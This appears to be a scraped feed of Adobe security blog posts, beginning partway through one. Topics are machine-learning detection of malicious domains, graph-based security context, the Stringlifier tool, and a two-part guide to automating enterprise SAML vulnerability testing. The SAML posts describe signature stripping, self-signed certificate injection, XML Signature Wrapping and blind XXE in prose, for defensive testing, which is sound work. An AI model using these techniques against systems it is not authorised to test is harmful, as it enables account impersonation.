Importantly, the training data was specifically selected to be disjoint, in order to reduce the common bias of the three classifiers and the effect of mislabeled data from our sources of truth.

Here are some useful stats resulting from the training data (see Table 1, below). The total number of examples is around 2M examples with 1.1M being benign examples and almost 9M malign.

Whenever possible, we tried to obtain the subclassification of malicious domains. As one can see from Table 1, we also include examples of domains related to mining in our dataset. The examples labeled as unknown (UNK) are either domains for which we could not get any subclassification in the data-sources, or domains for which different sources had contradicting labels. In a real-world application, these would need to be investigated further. 

Drill-down into the system

Figure 2 above shows the generic architecture of our detection pipeline. As already mentioned, our system relies on three classifiers that independently determine if a domain is malicious or not:

  1. Naming: the choice of words/letters used in the FQDN provides important information such as: (a) is the domain name the product of a domain-generation-algorithm (DGA) or is it manually created; (b) what was the domain created for (simple news, blogs, presentation sites or adult content, phishing, malware, freemium, ransomware)
  2. Meta information: indicators such as google page-rank score, number of subdomains, geographic coverage etc., reflects the legitimacy of a domain.
  3. Access profiles: trends in global access to the domain and specifically gaps or newly created domains with high-frequency access are extremely useful in the analysis.

Note: This type of approach is not new. However, by building our own system, we were able to focus on potential threats that are more pertinent to Adobe. We carefully selected the training data and included everything in our internal Threat Intelligence Platform. 

After experimenting with several machine-learning methods and techniques we finally decided to use (a) a random forest for both meta-information and access profiles and (b) a character-level unidirectional Long-Short-Term-Memory (LSTM) network at character level for the domain-name classifier. 

We experimented with several normalization methods for the meta and access profile classifiers, but the best results were obtained with raw values. For the domain-name classifier, best results were obtained by feeding the characters in reverse order and using the last cell state for classification, while also back-propagating an auxiliary loss for the subclass, which was masked of the UNK labels. 

At least for two of the classifiers, the results on the development set look promising. However, we are talking about synthetically generated data. This poses two issues:

  1. The distribution of malicious/benign examples in the dataset does not reflect that of real data, thus the results are biased;
  2. We don’t know how data from external sources was collected by the third parties. They could have used some heuristics in their search, and this could lead our own classifiers simply picking up the same heuristics which would likely lead to an incorrectly increased accuracy figure on the development set (since it shared the same traits and the training dataset)

The best thing is to assess how the classifiers react to real-life data. However, there is no source of truth for this data, which makes it impossible to compute any accuracy or F-Score automatically. To give some insights, Table 2 below shows the number of alarms triggered for the newly observed domains in a single day, in the following scenarios: (a) each individual classifier used on its own; (b) each pair of two classifiers voting the same verdict and (c) all three classifiers unanimously agreeing on the verdict. 

SetupPercent of detections 
Naming23.10 % 
Meta31.51 % 
Access16.29 % 
Naming+Meta15.16 % 
Naming+Access8.30 % 
Meta+Access12.13 % 
Naming+Meta+Access6.54 % 

Obviously, the smallest number of artifacts is generated by the unanimous vote of the three classifiers. While this is still a large number to investigate manually, it is far more manageable by sandbox testing APIs without exceeding daily quota. By putting the “Naming+Meta+Access” domains through the sandbox testing service, we came up with a short list of 11 domains which were manually checked.

We have begun employing these techniques to help us do much more efficient evaluations of external resources and their relative threat level. This information combined with intelligence from our other efforts such as Tripod continue to improve the robustness of our overall threat intelligence modeling. 

Tiberiu Boros
Data Scientist/Machine Learning Engineer

Andrei Cotaie
Senior Security Engineer

Kumar Vikramjeet
Security Engineer

Leveraging Graphs to Improve Security Automation and Analysis

$
0
0

In my last blog, I gave the background for a research project where I am using graph databases to create graphs of application metadata to improve the efficiency of security automation.  In this blog, we will look at a few theoretical graphs to show their potential value. Essentially, what we are building in this series is a social network-style graph for your applications. Each application is a “profile” where you record its metadata and its connections throughout your organization. By interconnecting all of the application security and service-related data from across your organization, you can obtain far greater context regarding potential security risks than is possible with many existing techniques.  

Many social media platforms have a graph database as their back end since it is the most logical representation for what they are trying to achieve. People on social media networks are typically represented as nodes. Their potential likes and interests are also represented as nodes. The graph will use labeled edge to express the context of the connections between the people with their interest.  Edges can even have weights to express the strength of the connections.

https://creativecommons.org/licenses/by-sa/3.0/

These graphs can allow social media platforms to create a contextual view of a person by interconnecting the different parts of their life. We can use this same approach to create a better contextual understanding of our services at both the network and application layer. By having the full context, we can make better judgments in both automated and human review.

For instance, most firewall rules are just a list of IPs. If you work with a single network, then you probably have your network’s IPs memorized. However, if you work in a central security team with multiple networks, then that becomes difficult.

Therefore, as hypothetical example, a review of firewall rules might give you the following limited amount of information regarding the allowed service to service communication between two public services:

    1.2.3.4 makes egress port 80 connections to 5.6.7.8

The use of port 80 is a bad security practice but, without context, it is hard to know the exact severity.  Instead, it would be more useful to have this information during a proactive review:

   1.2.3.4 (Image Processing Service) makes egress port 80 connections to 5.6.7.8 (auth.foo.com)

With this added context, it is now clear that the Image Processing Service is making an insecure network communication to an authentication service which would be significantly bad. Obviously, you wouldn’t run an auth service on port 80, but this hypothetical example illustrates the point. The added context of who and what those IPs represent provide context with which to make more informed decisions.

Obtaining that context requires mapping the IP to the account ID, domain name, and project.  In addition, you would want to be able to map the project to an owner for quick remediation. If you work solely within a single account within a single cloud provider, such as AWS, then you can maybe get this information from Route53, AWS tags, and a collection of API queries. However, more complex environments will have multiple account IDs and may also be deployed across multiple cloud providers. This means that you must collect the information from multiple sources, and this is where creating a graph can help you create those links. A graph would allow you to build a model that might look like the image below:

Similarly, when doing an application layer security review, it would be ideal to have the complete context of an application in order to view it from a “single pane of glass”.  This requires the ability to make connections between third-party library trackers, static analysis tools, JIRA entries, GitHub projects, cloud providers, and several other data sources. A graph representation of what the relations between these data sources might look like this image below:

In these sample graphs, the edge labels, weights, and directions have been excluded for simplicity.  The important takeaway is that it is possible to easily traverse from any point on the graph to any other point on the graph. Therefore, if you want to dig into a finding from a static analysis tool, then you can link that finding to the IP and domain where it is hosted for further testing as well as to the JIRA location where you will need to file any potential bugs. In the bottom left hand corner, you can see that it is also possible to link this initial project with other projects that share matching properties. These types of connections would allow you to perform a breadth-based search across multiple projects based on the GitHub organization, cost center, or management contact. Graphs provide multiple options for contextualizing data from the perspective on any given data point.

Another important advantage of graphs is that building the graph doesn’t require you to have all your information neatly pre-organized. Many of the tools that contain the information used to build Adobe’s graphs are not designed to be cross-referenced. Instead the graph is built like a puzzle. You start by creating small sub-components of the graph from the individual tools. At first, you are not quite sure how it will fit together with all the other pieces. However, you keep connecting smaller structures into a larger structure whenever you find a common property to create the final picture.

For instance, perhaps the project name someone put into the static analysis tool doesn’t exactly match any of the names found in GitHub. It is not uncommon to for someone to use an internal code name for the project in one tool and the public name of the project in another tool. This makes it impossible for code to link the two together based on their name. However, if both data sources used the same GitHub URL, then you will be able to connect the two sources in the graph.

Chances are there will be some amount of redundancy which means that if you couldn’t immediately link something based on one data source, you will be able to link it later using another data source. For instance, in the diagram above, there are two connections going into the domain name node. However, let’s say that for a given project, it was not possible to tie a project name directly to the domain name with a direct connection. That would be fine so long as the secondary path between using the IP address to bridge the AWS Account ID and the domain name. The more data sources that you add, the more links you will be able to find which creates redundancy.

This gives you the freedom not to worry about whether something connects at any individual stage of the process. Instead, you just keep adding data from different sources and adding links as you find them. You only worry about the final graph once all the data is added into the database.

Once the graph is created, any association that you can create in your mind by looking at a picture of the graph, you can also make via code. Using a graph query language, you can ask the question, “What is the domain name that is associated with this static analysis project?”  The process will start at the node for the static analysis tool’s project and walk the graph until it finds the corresponding domain name node. These queries will not wander off into other projects if you were careful about the direction of your edges when creating the graph. The details of graph design will be discussed later in this series. The overall point is that a single query can make a dynamic correlation that might otherwise have taken multiple cross-references in a more traditional approach.

This makes graphs very powerful for both manual review and automation. With automation, you can use the data from your static analysis tool to trigger dynamic testing against domains in a targeted fashion. If you are performing a manual review, contextual information can allow you to work more efficiently as shown with the network example. In addition, by having all your security tool references as members of the graph, it is possible to create a “single pane of glass” UI for viewing all the relevant security information for a given project. You can examine the basics at a high level and then deep dive into respective tools using the reference recorded in the graph.

Overall, the graphs allow you to perform your analysis, either manually or through automated tools, with more efficiency and greater context. Rather than having security information dispersed across your organization in isolated silos, you can connect all of it into complete application profiles that provide you with all the necessary information to have a complete beginning to end workflow for analyzing and triaging issues. In my upcoming blogs, I will detail how you can build and query these graphs within your organization.

Peleus Uhley
Principal Scientist

Introducing Stringlifier – Adobe Security Team’s Latest Open Source Project

$
0
0

“1e32jnd9312”, “32189321-DEF3123-9898312”, “ADEFi382819312.” Do these strings seem familiar? They could be hashes, random generated passwords, API keys, or many other types of strings. You can usually spot them in logs, command lines, configuration files, and source code. Whether you are analyzing security and application logs or you are hunting for accidentally exposed credentials, they can, unfortunately, make your life a lot harder. This is because building a search pattern for something random is a particularly hard task.

Stringlifier is our latest open source project and it can help you in tackling this often difficult task. The project is an open-source python package that allows you to detect code/text that resembles a randomly generated string in any plain text. It uses machine learning to distinguish between normal and random character sequences. It can also be adapted for more fine-grained classifications (password, API key, hash, etc.). 

The entire source-code is available now in Adobe’s public Github repository. We also provide a “pip” (Python package installer) installation package that includes a pre-trained model.

Quick Tutorial

We did our best to make Stringlifier as easy-to-use as possible. To get started, you can simply install the module using pip.

$ pip install stringlifier

After this, all you have to do is import the API, create a new instance, and pass any string through it:

from stringlifier.api import Stringlifier
stringlifier=Stringlifier()
s = stringlifier('/System/Library/DriverExtensions/AppleUserHIDDrivers.dext/AppleUserHIDDrivers com.apple.driverkit.AppleUserUSBHostHIDDevice0 0x10000992d')

In this simple example, the results (stored in s) should be:

‘/System/Library/DriverExtensions/AppleUserHIDDrivers.dext/AppleUserHIDDrivers com.apple.driverkit.AppleUserUSBHostHIDDevice0 <RANDOM_STRING>’

And happening under the hood:

 “0x10000992d” was replaced by a token labeled “<RANDOM_STRING>”. 

Why Stringlifier?

In some of our previous blogs we spoke about finding anomalies in different datasets and we also introduced an open source tool at that time called Tripod to help. In many cases multiple datapoints contain long strings which we have to pre-process and convert into a numerical form before we can feed them into machine learning models. We have done this using a few approaches: BLEU Scoring with custom clustering, TF-IDF with bag of words, TF-IDF using a byte-pair-encoding (BPE) approach and K-Means on top of it, and others. Grouping strings into robust clusters is really important for any of these approaches. But, we have always hit a roadblock: random strings. Depending on the size of the random string compared with the string itself, it might influence the result of the clustering algorithm. This can disrupt how the data is going to be grouped.

For example, we are currently working to detect anomalies in datasets generated by one of Adobe’s other open source projects in daily active use here, HubbleStack: 

Let’s take the following command line as an example:

string = ”/run/torcx/bin/docker --config /var/lib/mesos/slave/slaves/db2bb0dd-12b0-4167-a1cc-23ef4a4a4211-S1196/frameworks/db2bb0dd-12b0-4167-a1cc-23ef4a4a4211-0001/executors/bladerunner-sysdig.ec491d2d-b02e-11ea-899e-86449ab0c296/runs/162e0529-7244-4f9b-aaff-dd32d015514e/.docker run --privileged --userns=host -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro internaladobeurl.com/url/url:1.0.0”

This is a valid command line. However, if you take into consideration all the UUIDs present here, it becomes a total mess. Stringlifier can help us clean it up really fast:

s = stringlifier(string)

“'/run/torcx/bin/docker --config /var/lib/mesos/slave/slaves/<RANDOM_STRING>-S1196/frameworks/<RANDOM_STRING>-0001/executors/bladerunner-sysdig.<RANDOM_STRING>/runs/<RANDOM_STRING>/.docker run --privileged --userns=host -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro internaladobeurl.com/url/url:1.0.0”

All of the random character sequences where replaced with <RANDOM_STRING>.  This makes it easier to group similar types of command lines that employ random hashes in their parameters but will otherwise have an identical behavior and scope. Also, as a nice addition, the machine learning model caught that “0001” and “S1196” are not part of random strings. 

We hope you find stiringlifier useful. The entire source-code is available in Adobe’s GitHub repository. You can also find all of our other open source projects from across Adobe’s security teams in that repository. We look forward to getting feedback and contributions are always welcome.

Tiberiu Boros
Data Scientist/Machine Learning Engineer

Andrei Cotaie
Sr. Security Engineer

Kumar Vikramjeet
Security Engineer

Automating Enterprise SAML Security Tests – Part I

$
0
0

Single Sign-On (SSO) applications are becoming increasingly prevalent in organizations today. While there are many different SSO configuration types, Security Assertion Markup Language (SAML) is one of the most common in enterprise environments. Unfortunately, the current SAML 2.0 version is also old (introduced in 2005), complex, and prone to misconfiguration, which can result in critical authentication and authorization vulnerabilities. Most large organizations likely have hundreds or thousands of applications that have been configured with SAML over the past 15 years, and many new applications still choose to incorporate SAML over other options, like OAuth or Central Authentication Service (CAS). The combination of all these factors can often result in a gold mine of findings for security teams to uncover.

In consideration with a recent Adobe Security Blog post, Creatively Scaling Application Security Coverage and Depth, one can also recognize the importance of automating these types of projects that result in numerous high-impact findings. Not only do these findings help close potential security holes, but they also highlight where the application security review processes can improve. As mentioned in the above article, security teams can get creative in how they approach these tests and implement a process that is scalable, has low false positives, and can point to areas of improvement. Because of how SAML is incorporated into an existing environment, we are provided with a valuable opportunity to programmatically analyze each workflow and follow up with better preventative controls.

In this blog post, we will explain in detail how an organization can gather an inventory of SAML-based applications, test for vulnerabilities in each workflow, and then effectively validate and report those findings with minimal false positives. We will also shed light on common mistakes that can complicate and slow down a project and provide useful tips and tricks that can help avoid these pitfalls. Lastly, we will outline some follow-up actions and controls that can be put into place after testing has been completed and offer a few side-project ideas that can be taken up alongside or after the initial project. Now, let’s dive into how to prepare for testing.

Scaling SAML Tests

Application Inventory

While many organizations suffer from inadequate application inventories, SAML environments fill that gap with a collection of pre-onboarded applications. In order to issue SAML login requests to applications or Service Providers (SPs), an Identity Provider (IDP) is configured to handle initial user authentication (typically against Active Directory) and then communicate that identity to each SP during the respective login. Regardless of the robustness and quality of an organization’s existing application inventory, IDPs house a well-formatted catalog of already-configured applications and contain all the information necessary for various kinds of SAML tests (see Figure 1). Completeness and uniformity of the application data found here facilitate automation of tests by providing Assertion Consumer Service (ACS) URLs and other SAML-specific information about onboarded applications. Whether it’s an in-house IDP or a SaaS product in use, there will be a database or API somewhere that can offer this inventory. 

In addition to having an IDP that houses SAML applications and issues signed SAML Responses, SAML tests will also require a test user in the IDP that has login permissions to all applications to be tested. While these “super accounts” go against security best practices of limiting the number of powerful, privileged users, it is necessary in order to conduct tests at scale. A few ways to limit risk that accompanies the existence of such a powerful IDP account is to temporarily enable the account during testing, then disable it again when done, use multi-factor authentication (MFA), and limit the account’s permissions to read-only.

A picture containing drawing

Description automatically generated

Finding SAML Vulnerabilities

As much research has already been conducted and shared regarding testing the security of SAML integrations, details regarding common vulnerabilities will not be expounded in this post. However, some resources and additional analysis around these issues and how they originate in an environment are provided at the end of this post under Appendix A.

Several SAML security tools are publicly available for manually testing single applications, but we have yet to find one that can test multiple SAML workflows back to back. Most public SAML tools are built for semi-manual usage, probably due to an effort to appeal to a wider, more diverse audience and because of the uniqueness of each test case. For example, different IDPs will each have their own distinct means of authentication, managing SAML inventory and application access, and issuing valid SAML Responses. Because of this, specialized tooling needs to be created for each unique environment that can drive the tests from beginning till end. In our case, we used python to authenticate to our IDP and then produce valid SAML Responses for each active SAML application. We then incorporated a customized version of SAML Raider, a Burp Suite plugin, into our python automation using Py4J in order to conduct various SAML tests. At this point, further specialized automation is needed to determine correctness of findings.

Unfortunately, there are virtually infinite ways an application could respond to a SAML Response. In the case of a legitimate login, it could return a Set-Cookie or an Authentication header, or it could return a session ID in the URL or in a hidden HTML input tag. Along the same lines, there are several different potential responses for a failed login, which could include different combinations of status codes, error messages and redirects. It is highly unlikely that all of an organization’s applications respond to SAML Responses the same way, and this is especially true between different organizations. Thus, automated testing is most-likely to be successful when using a combination of public tools and environment-specific code. 

Potential Setbacks & Tips

During automation of SAML tests, there are several potential setbacks that engineers should be mindful of before starting:

  1. If no API is available for the IDP, then authenticating to it in order to retrieve the SAML inventory could prove challenging, especially if MFA is required. Full automation here may depend on the ability to programmatically approve MFA requests. This issue could also arise as SAML Responses are generated for SPs that require MFA approval in addition to the initial SAML factor. Depending on how many SPs in an IDP require MFA and if the MFA can be automated, this could present a heavy toll on test speed and developer sanity! If MFAs are hindering a project, check if there is a specialized utility account for automation that can automatically approve or bypass MFA restrictions to speed up testing. Otherwise, perhaps an MFA client could be installed on the laptop/server that runs the code and the script could programmatically accept those MFA challenges.
  2. Discrepancies between private/public tool languages can require inventive workarounds to ensure code bases run smoothly together. For example, we used Py4J to allow our Python automation code to interact with our Java test code. Additionally, a lack of documentation and support for open source tools can slow down development and require additional work to maintain a secure, working state. Try to stick to well-vetted and maintained public tools where possible to avoid reinventing the wheel.
  3. A seemingly infinite variety of different responses to both good and bad SAML Responses means that it can be very hard to be 100% certain about the results of a test case. While some newer environments may strongly adhere to more modern, standard practices, like setting session cookies or Authentication headers, most companies probably have a mixture of older applications that handle authentication differently from one another. Verifying true and false positives by analyzing deviations from a legitimate login will be explored more in the next section. Keep this approach in mind as you start thinking about how to test.
  4. Vendor or SaaS applications that have been onboarded to your IDP may not support automatic account provisioning via SAML. That means that although you may have access to the application in your IDP, the SaaS application may not recognize you as a registered user when attempting to authenticate. These applications may be difficult to test because they will never result in successful authentication until an account is created for your scans or a legitimate account is identified and impersonated – assuming the app is vulnerable. SAML tests may still work though, depending on when an application does its signature checks. Most apps will likely first go through normal SAML processing and validation and then lookup the user. In this case, tests can be conducted normally, but instead of looking for successful logins, look for deviations from the legitimate attempted login response, as mentioned in point #3 above. In the case that an application looks up the Subject (username) before validating signatures, then a testing account would need to be provisioned or you would need permission to attempt to impersonate someone who already has access. Unfortunately, these may require manual intervention and setup. You may consider running a side scan for common “user not found” responses to see where you may need to manually provision a user for SAML scans.

Eliminating False Positives

Given the likely mixture of applications’ different responses to legitimate and illegitimate SAML flows, creativity will play a strong role in determining how to best differentiate successful versus failed test cases. Instead of attempting to enumerate all the various ways to identify a successful login after issuing a modified assertion, it is much easier to simply match a test’s response to that of a known successful login. For example, one could first run legitimate logins across all SAML apps, save those results, and then run their various tests against all the SAML apps. The tests that result in HTTP responses that match the legitimate responses are likely true positives. Depending on how the tests were conducted, this can produce highly accurate results.

If the technique above does not provide sufficient confidence of a true positive, then additional checks could be performed to prove successful authentication. Some potential methods could include analyzing each request’s response time or the contents of the response headers and body. Perhaps a valid login takes longer as additional resources are fetched and loaded? Or perhaps a successful login returns a common authentication header? Or maybe a successful login returns commonly used HTML, like profile pictures, copyright dates or navigation bars? One could also use the same or similar logic to identify when a test is not successful, like when an error has prevented an exploit from succeeding, or a login failure has redirected the user back to a login form. 

Furthermore, there may be other out-of-band methods to validate a successful login, like application logging. However, scaling this validation method would require that all SAML applications log authentication results in the same consumable format and that such logs can be programmatically aggregated and fetched for analysis.

As a last resort, high-confidence findings can be manually validated. Using a combination of the other validation methods described above, a confidence rating – think of a pendulum – could be applied to findings, and then follow-up analysis can be performed after the confidence rating passes a predefined threshold.

XSW Validation

Another crucial point to keep in mind when validating results is that applications will respond differently to signature stripping and self-signing attacks versus XML Signature Wrapping (XSW) attacks. While directly removing or modifying a signature will result in a simple pass/fail scenario, the sole acceptance of an XSW payload by a SAML ACS does not prove that the ACS is vulnerable to XSW attacks. Because XSW attacks contain both the original and the modified Assertion or Response nodes, multiple tests need to be conducted for each XSW arrangement to determine which node was processed. In the scenario where an ACS successfully authenticates an XSW attack, the ACS could have ignored the fraudulent XML and processed the correctly signed and referenced XML, which doesn’t demonstrate vulnerabilities. 

One way to validate an XSW vulnerability is to attempt to impersonate another user. However, that would require a second high-privilege account and the ability to determine which user in the XSW attack was authenticated. Identifying the currently logged in user isn’t always possible, though it could potentially be done by checking the response HTML or text for a username or other identifying attribute. Instead, sending two slightly different payloads for the same XSW arrangement could indicate which Assertion or Response node is being processed by the ACS. For example, in the case of an XSW attack using a cloned Assertion, the first payload would be sent as a simple XSW attack containing two Assertions for a single legitimate user. Then an additional payload would be sent with a missing NameID (or user Subject) in the cloned Assertion. If both tests result in successful authentication, then the ACS is likely ignoring the duplicate Assertion and correctly processing the legitimately signed Assertion. If both tests fail, then the app is probably throwing an error because of duplicate Assertions (this is probably the best response to a probable attack). However, if the first test succeeds and the second test fails, then we know that the ACS is successfully processing the cloned and modified XML, thus allowing user impersonation via XSW attacks. So, if you were testing eight different XSW arrangements, then you would perform sixteen XSW tests for each application – two tests for each of the eight XSW arrangements.

I will be offering more best practices around enterprise SAML security in the next part of this blog later this month.

Ty Anderson
Security Researcher

Automating Enterprise SAML Security Tests – Part II

$
0
0

(This is part two of a two-part series offering guidance on how you can automate security tests for enterprise SAML infrastructure. In our first post we discussed the common vulnerabilities in enterprise SAML implementations and how to recognize them. We also provided guidance on how to try to eliminate false positives when attempting to detect issues. This post continues the conversation with additional guidance for setting up automated testing for issues and possible remediations) 

Reporting Findings

Prioritizing Risk and Ownership Attribution

After tests have been conducted and true positives recorded, the detections must be analyzed for risk severity and attributed to the appropriate team for remediation efforts. Digital asset valuation will not be expounded here, but factors such as environment location (internal/external), legal compliance, data sensitivity and business importance/impact will affect the importance of an application and subsequently the urgency of remediation efforts. Vulnerabilities in high-value applications should be prioritized higher than similar vulnerabilities in a static lunch menu for example.

In the case of missing application ownership attribution in the application inventory, try to be creative in finding owners by other means. Perhaps you can find a similarly named mailing list where you can find the app’s admins or a support team? Perhaps the team has an internal wiki that you could search for? Or perhaps the application itself has a Contact Us form? Different architectures in use may be helpful as well, such as a record of who requested or owns the DNS record for the app, or a platform provisioning record, or an internal cost center that the server/resources are allocated to. And, as always, look for ways in which you could automate some of this information gathering to create a trail for attribution.

Presentation

Many organizations are split into different departments with often-competing priorities. To help ease digestion of the vulnerability report or ticket, it’s important to provide accurate and concise information about the initiative and the finding. The goal here is to make it as clear and self-explanatory as possible so as to avoid repetitive questions and conversations. An example ticket outline is provided in Appendix B.

Even with all of this information, teams may still want proof of actual exploitation or may argue that they have countermeasures in place. These arguments often diminish efficiency gains behind automation by introducing additional manual steps. Try to preemptively answer these objections before they arise. For example, screenshots or resulting HTML files can prove modification of displayed or returned SAML attributes. References to the time of the test may also point to evidence of a successful tests in application logs.

Another potential argument that app teams may offer is that they are using encryption in their SAML assertions. While the intention is good, if they don’t have specific countermeasures in place, confidentiality can be broken with published and proven attacks on XML encryption (white paper). The better approach is to fix the underlying issue, then add defense in depth measures, like encryption, on top of the root fix (these encryption attacks are mitigated if signatures are used properly).

Sustainable Action

Implementing Controls

After reporting on vulnerable applications, controls need to be put into place to prevent or quickly detect additional occurrences of these issues. Below is a list of potential controls that could help (ranked most-beneficial to least-beneficial):

  1. Require a clean SAML scan during IDP onboarding. If any errors or vulnerabilities are found, the application is prevented from completely onboarding or is disabled until the application successfully passes all SAML tests.
  2. Run automated SAML scans at regular intervals and report findings to appropriate channels (auto ticket generation, instant messaging channels, email lists, etc).
  3. Require the IDP team to manually validate the absence of SAML vulnerabilities as new applications are onboarded. This could be done using the free SAML Raider tool. Testing here would be thorough and catch issues before released, but the manual efforts could be burdensome, depending on the amount of new applications requesting SAML.
  4. Require app teams to self-attest that their application is free of SAML vulnerabilities before onboarding (also provide link to common SAML vulnerabilities). This is mostly to raise awareness about the issues rather than to ensure a secure state, as app teams could breeze past the checklist or struggle to accurately perform the SAML tests.

It is likely that new SAML vulnerabilities will be uncovered over time, so updates to the scanning tool and regular scans will need to accompany any implemented controls. Also, changes may be made to an application’s existing SAML configuration that may introduce vulnerabilities after deployment, so subsequent scans will detect vulnerabilities there as well.

Additional steps that could help secure applications earlier in the Software Development Life Cycle (SDLC) include trainings or communications, like quarterly events, group emails or presentations. This would hopefully stop the vulnerabilities from ever entering the code, thus saving time and resources in development costs.

Another approach, though an entirely different initiative, could be assessing all applications for outdated library dependencies. For example, a novel XSW vulnerability was discovered in SimpleSAMLphp in October 2019 (see here) that is not currently present in SAML Raider tests, as of July 2020. While automated scans that use SAML Raider would have missed this, a library dependency scanner could have caught this SAML authentication bypass vulnerability as it was made public.

Additional Tips

Since SAML is based on XML, XML External Entities (XXE) attacks are another risk that could be present in the SAML ACS. Though it is not specifically a vulnerability in the SAML protocol, it is a high-impact vulnerability that can exist within SAML processors. Testing for XXE in SAML can be much easier than running the other SAML tests, as all that is needed are the SAML ACS endpoints. Because XML is processed top-to-bottom, a payload doesn’t need to contain a valid SAML Response – the XXE would be processed before any SAML processing would occur. Simply send an XML Prolog and XXE payload to a SAML ACS and see if you can validate blind XXE injection using DNS or HTTP traffic. Keep in mind that SAML ACS’s process URL-encoded and base64-encoded data from the SAMLResponse POST parameter. Although you won’t need a valid SAML Response, you will need to mimic the presentation of a legitimate SAML Response.

In addition to typical SAML or XML vulnerabilities, keep an eye out for other issues, like communication over HTTP or dangling SAML configurations. SAML Responses sent over HTTP could potentially be sniffed and replayed to impersonate another user. Also, dangling application configurations in the IDP that remain after the application is decommissioned could be hijacked to point users and user attributes to new rogue applications.

Common SAML Weaknesses

As SAML is an XML-based language, the primary security controls in place are XML Signatures. At a minimum, IDPs should be configured to issue and sign either the SAML Response (the root node) or the Assertion node (the element containing the given user’s identity and attributes). Preferably, both nodes are signed with a CA-signed private key to ensure the integrity and non-repudiation of the message’s details and the user’s identity. As mentioned before though, the complexity involved in correctly configuring an application to an IDP and implementing the proper validation and consumption of incoming SAML assertions introduces several openings for risk. Exploitation of these weaknesses is facilitated as SAML assertions are often returned to the end user’s browser before they are forwarded to an SP. This forwarding functionality exposes assertions to Man-in-the-Middle attacks and drastically increases the attack surface, as all users of the application (often all Active Directory users) are able to intercept and modify their own assertions. If successful, attribute modification can lead to user impersonation, privilege escalation and potentially code injection.

Falsified Signatures

In the initial phases of onboarding an application to an IDP, metadata for each side is exchanged. Embedded in this information are various connection details, including the SP’s Assertion Consumer Service (ACS) URL (where SAML assertions are sent for processing) and the IDP’s x509 public certificate (used for XML signature validation). One common mistake that applications can make when validating SAML signatures is trusting and utilizing the x509 certificates that are presented within SAML messages. Because users have access to modify assertions before they are sent to the ACS, they can strip existing XML signatures, alter their user attributes, re-sign the SAML XML with a self-signed certificate and then forward their modified assertion and self-signed certificate to the application for processing. If SPs are not using the correct IDP certificate for signature validation and are instead using certificates from within the SAML assertions, then injected, self-signed certificates could be used to validate signatures over modified SAML elements. To ensure only the correct certificate is used, applications must pull the IDP’s certificate either directly from an IDP-controlled host (like a PKI-verified web server) or from the original, stored metadata file or value that was provided during onboarding. 

XML Signature Wrapping (XSW)

Another category of vulnerabilities commonly found in SAML is XML Signature Wrapping (XSW). This occurs when XML – or SAML – elements are cloned and rearranged in an attempt to confuse the application’s ACS into validating provided signatures, but then processing other duplicate elements. SAML signatures often use references to point to specific nodes that they are attesting. Although provided signatures may validate their referenced nodes, applications will sometimes then use top-down tree-based navigation and indexes or getElementsByTagName or other methods to subsequently parse SAML nodes for processing and incorrectly process the wrong nodes. For example, Figure 2 below demonstrates how an Assertion could be duplicated and rearranged in an attempt to get the ACS to validate the second Assertion, but then process the first modified, unsigned Assertion.

A close up of a sign

Description automatically generated
(Image from https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)

Stripping Signatures

In another scenario, applications may fail to validate any signature at all. This is common among applications that attempt to process SAML with custom code, rather than using a specially designed SAML library. In this case, the ACS may verify the presence of a signature but not attempt to validate it, or it may simply ignore whether or not there is any signature.

Example SAML Incident Ticket Outline

This example is provided to help you set up an issue resolution workflow for your development team as they work to apply the guidance offered in this blog.

Summary: Describe the initiative and the potential impact of the finding. This adds authority and urgency to your report and provides a quick TLDR of the ticket. 

Description: Provide a high-level overview of the issue detected and how it was discovered, then refer the reader to additional documentation established elsewhere (internal wiki, public reports, etc).

Scope: Identify the vulnerable resource (application URL, etc).

Risk Ranking: Score the vulnerability (1-10 or Low-High, etc) and provide justification for the scoring (ease of exploitability, impact, attack surface, etc). Many organizations have published authoritative and executive-backed standards that govern vulnerability management and can help support the report or ticket. The more detailed this section is, the more it will help reduce time-consuming counterarguments and repetitive requests.

Steps to Reproduce: Provide detailed instructions on how to reproduce the issue so that teams have the option to validate the vulnerability and any attempted fixes. These could be bullet points or How-To videos, though keep in mind that app teams may come back asking for help. If remediation steps are deemed too difficult, time-consuming or costly for app teams to reproduce on their own, then a regularly updated dashboard showing the status of each detection could be used to communicate the current state of the vulnerability. Another level of maturity in automation is to have the ticket strongly tied to the automation, so if the detection drops off the scans, then the ticket is closed automatically.

Suggested Remediation Steps: Because application environments and remediation limitations differ to varying extents, teams will likely be selective in which remediation steps they implement. A prioritized list of recommended solutions could be given, with further documentation linked for additional details and guidance on each option. Potential options could be migrating to other authentication methods, like OIDC, or updating the SAML library being used, or incorporating a popular, well-vetted SAML library instead of using a custom solution. Offering additional defense in depth solutions can further secure apps, like limiting visibility of apps on a need-to-know basis and adding encryption on top of secure implementations.

Additional Resources

The following are some resources that may prove useful in better understanding and testing SAML attacks:

How to Hunt Bugs in SAML (by epi052)

Attacking SSO: Common SAML Vulnerabilities and Ways to Find Them (by Jem Jensen)

On Breaking SAML: Be Whoever You Want to Be (by various authors)

SAML Raider Burp Extension (by Bischofberger and Duss)

Happy hunting,
Ty Anderson
Security Researcher

Better Privileged Account Security Through Automation

$
0
0

One of the more common security issues organizations face today is helping ensure that users with elevated privileges rotate their passwords for various internal resources on a regular basis. To help enforce password rotation, organizations typically implement automatic password expiration timeframes, commonly set for every 30, 60 or 90 days. These privileged users receive several notifications in the weeks and days leading up to the expiry date, reminding them to change their expiring password before the date to avoid being locked out. 

While a step in the right direction, this approach still has drawbacks that affect both the privileged users and the security organization. For example, even with multiple notices, privileged users forget to change their password, simply because they’re too busy or they’re on vacation on the expiration date. Or maybe they remember to rotate the password, but then they forget what they changed it to. In any case, the result is the same: frustrated users as well as frustrated IT personnel, both of whom are losing valuable time in the process. 

Because of all these reasons and more, many security organizations avoid enforced password rotation for privileged accounts altogether, leaving gaping holes in infrastructure security across the organization. 

